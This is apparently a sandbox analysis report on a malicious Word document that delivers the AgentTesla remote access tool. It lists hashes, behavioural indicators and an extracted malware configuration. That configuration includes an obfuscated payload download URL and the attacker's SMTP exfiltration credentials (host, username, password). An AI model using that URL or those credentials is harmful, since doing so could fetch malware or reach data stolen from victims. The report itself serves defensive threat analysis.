General
-
Target
productXspecifications.docx.doc
-
Size
10KB
-
Sample
230215-kywtasbb63
-
MD5
a54faaf77e243d002a066ed24194f186
-
SHA1
4f7ec24108e808a8ee6cbf77e2f1f760afc19dbe
-
SHA256
45c80bfc78f3864e69056d98e91847c0da257e05469f1538978aa6e844f49224
-
SHA512
6f5bf069c2ba67da690b4f1ed5798a69f410980f0e838c6fe24c9b616292adc8a1d0ffe989e35fd5b50898f89f43450827097b2cefb787583869ea6f9cdfc275
-
SSDEEP
192:ScIMmtP5hG/b7XN+eOSFbO+5+5F7Jar/YEChI3hBt:SPXRE7XtOa7wtar/YECOF
Static task
static1
Behavioral task
behavioral1
Sample
productXspecifications.docx
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
productXspecifications.docx
Resource
win10v2004-20220812-en
Malware Config
Extracted
http:/QQQQWWWWQWWWWQWWQWQWQWQQWQWQQWQWQWQWQWQWQWQQQQQQQQOQQQQQOOOOOOOOQOQQQQOQOQOQOQOQOQQWWWWQWQWQWQWQWQWQWQWQQWQ@1806682775/OO.DOC
Extracted
agenttesla
Protocol: smtp- Host:
us2.smtp.mailhostbox.com - Port:
587 - Username:
lawsaman@steveboi.com - Password:
!Gphfth8 - Email To:
lawsaman@steveboi.com
Targets
-
-
Target
productXspecifications.docx.doc
-
Size
10KB
-
MD5
a54faaf77e243d002a066ed24194f186
-
SHA1
4f7ec24108e808a8ee6cbf77e2f1f760afc19dbe
-
SHA256
45c80bfc78f3864e69056d98e91847c0da257e05469f1538978aa6e844f49224
-
SHA512
6f5bf069c2ba67da690b4f1ed5798a69f410980f0e838c6fe24c9b616292adc8a1d0ffe989e35fd5b50898f89f43450827097b2cefb787583869ea6f9cdfc275
-
SSDEEP
192:ScIMmtP5hG/b7XN+eOSFbO+5+5F7Jar/YEChI3hBt:SPXRE7XtOa7wtar/YECOF
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location
-
Executes dropped EXE
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Accesses Microsoft Outlook profiles
-
Suspicious use of SetThreadContext
-